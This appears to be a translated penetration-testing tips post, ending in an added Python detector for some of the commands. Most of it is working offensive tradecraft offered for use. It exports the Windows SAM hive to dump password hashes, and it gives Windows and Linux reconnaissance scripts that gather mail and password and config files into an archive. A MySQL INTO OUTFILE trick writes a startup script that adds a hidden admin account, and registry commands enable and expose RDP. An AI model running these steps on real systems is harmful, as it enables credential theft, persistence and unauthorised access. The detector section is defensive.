Penetration testing tips, update 4

How to obtain the local hashes when ethash is not AV-evading.
First export the registry key:
    regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   (2000)
    reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  (2003)
Watch out for permissions: by default the SAM key in the registry is not accessible. You have to grant Full Control on it before it can be read (this matters for interactive logons; with SYSTEM privileges you can ignore it).
The rest is simple: download the exported registry file to your own machine, edit the registry header, import it locally, then run a hash-dumping tool against the local users and you are done.
Once the hashes are dumped, remember to change your own account password back!
As far as I know, a certain someone got locked out of a VM several times with this method because they did not know the password!~

------------------------------------------

Scripts for collecting system information
For Windows:

@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator

echo #######scheduled tasks (at / schtasks)#####
schtasks /query

echo.
echo ####task-list#############
tasklist /svc
echo.
echo ####net-work information
ipconfig /all
route print
arp -a
netstat -an
ipconfig /displaydns
echo.
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree /F

For Linux:

#!/bin/bash

# headings are quoted: an unquoted leading '#' starts a comment and '>' or '&' would be parsed as shell operators
echo "#######getting sysinfo####"
echo "######usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "#######basic information##"
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null


echo "your id is $(id)"
echo "###atq&crontab#####"
atq
crontab -l
echo "#####about var#####"
set

echo "#####about network###"
####this is the key point in a pentest, but I am a newbie, so you need to add more here
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "########user####"
grep -i sh /etc/passwd

echo "######service####"
chkconfig --list

for i in oracle mysql tomcat samba apache ftp; do
    grep -i "$i" /etc/passwd
done

locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5

###maybe can use "tree /"###
echo "##packing up#########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

--------------------------------------------------------------------

tar archive:            tar -cvf /home/public_html/*.tar /home/public_html/
                        --exclude=  exclude files: *.gif   exclude a directory: /xx/xx/*
alzip archive (Korean): alzip -a D:\WEB\ d:\web\*.rar

Run systeminfo first before attempting privilege escalation.
token vulnerability, patch number KB956572
Churrasco          kb952004

---------------------------------------------------------------------

  1. create table a (cmd text);
  2. insert into a values ("set wshshell=createobject (""wscript.shell"")");
  3. insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
  4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
  5. select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

--------------------------------------------------------------

1. Query the terminal services (RDP) port
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. Enable terminal services on XP & 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal services port to 2008 (0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4. Remove the XP & 2003 firewall restriction on terminal services and the IP connection restriction (the value is quoted so reg.exe receives it as one argument)
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:@xpsp2res.dll,-22009" /f
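As an added defender-side example (not part of the original post), the Python detector below parses process-creation command lines and flags the SAM hive export from the first section and the RDP registry changes from this section. The log lines and their "timestamp user cmdline" format are constructed for the example.

```python
import re

# Constructed process-creation log lines ("<timestamp> <user> <command line>"); they mirror
# the commands in this post and are not real telemetry.
SAMPLE_LOGS = [
    r'2024-01-01T10:00:01 SYSTEM reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg',
    r'2024-01-01T10:00:02 alice REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f',
    r'2024-01-01T10:00:03 alice REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f',
    r'2024-01-01T10:00:04 alice REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f',
    r'2024-01-01T10:00:05 alice REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber',
    r'2024-01-01T10:00:06 bob notepad.exe c:\notes.txt',
]

# "reg export" or "regedit /e" whose target lies under the SAM hive (first section of the post).
SAM_EXPORT = re.compile(r"\breg(?:edit)?(?:\.exe)?\s+(?:export|/e)\b.*\\SAM\\SAM\\", re.I)
# Generic "reg add <key> /v <name> ... /d <data>" parser used for the RDP rules below.
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+(?P<key>.+?)\s+/v\s+(?P<name>\S+)(?:.*?/d\s+(?P<data>\S+))?", re.I)

def _to_int(data):
    """Parse a REG_DWORD value as typed on the command line (decimal or 0x-prefixed hex)."""
    try:
        return int(data, 16) if data.lower().startswith("0x") else int(data)
    except ValueError:
        return None

def classify(cmdline):
    """Return a finding name for one command line, or None when it is not of interest."""
    if SAM_EXPORT.search(cmdline):
        return "sam_hive_export"
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    key, name, data = m["key"].lower(), m["name"].lower(), m["data"] or ""
    if name == "fdenytsconnections" and _to_int(data) == 0:
        return "rdp_enabled_via_registry"
    if name == "portnumber" and ("rdp-tcp" in key or r"rdpwd\tds\tcp" in key):
        return f"rdp_port_changed_to_{_to_int(data)}"
    if r"globallyopenports\list" in key:
        return "firewall_port_opened_via_registry"
    return None

def scan(lines):
    """Map each log line to (timestamp, user, finding); lines with no finding are skipped."""
    findings = []
    for line in lines:
        ts, user, cmdline = line.split(maxsplit=2)
        finding = classify(cmdline)
        if finding:
            findings.append((ts, user, finding))
    return findings
```

The "reg query" line and the notepad line produce no finding, so read-only inspection of the port is not alerted on; only writes that enable RDP, move its port, or open it in the firewall are.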
